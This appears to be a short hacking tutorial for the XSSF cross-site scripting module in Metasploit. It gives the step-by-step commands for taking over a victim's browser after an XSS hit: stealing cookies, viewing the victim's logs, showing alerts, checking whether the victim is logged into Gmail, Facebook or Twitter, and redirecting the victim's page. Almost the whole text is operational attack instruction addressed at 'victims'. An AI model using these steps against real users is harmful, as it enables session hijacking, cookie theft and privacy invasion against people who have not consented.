First install XSSF in metasploit, please refer the following link “http://www.hackingarticles.in/xssf-cross-site-scripting-framework-in-metasploit/”
Now use the following command In metasploit to capture victim’s cookies
“use auxiliary/xssf/public/misc/cookie
Once you get msf auxiliary prompt run the following command
“xssf_logs 1”
Now run the command “xssf_log 2” to store the logs where 2 is the Session ID
Now run “xssf_urls” command to get all xssf URL commands
Now run “http://localhost:8889/gui.html?guipage=main” to see the logs of victim’s PC.
You can see the logs in the last section as shown in the following image.
If you wish to warn the victim run “use auxiliary/xssf/public/misc/alert” command
The following is the Alert message on Victim’s Screen
You can see the logs in the last section as shown in the following image.
Now refresh your log browser and see the series of logs as shown in the following image.
Now run “use auxiliary/xssf/public/misc/check_connected” to check if victim has opened any Social networking sites (eg . gmail, facebook , twitter)
Refresh the log browser and see the logs getting updated as shown in below image.
Finally run “use auxiliary/xssf/public/misc/redirectto redirect the victim’s page”
Refresh the log browser and see the logs getting updated as shown in below image.
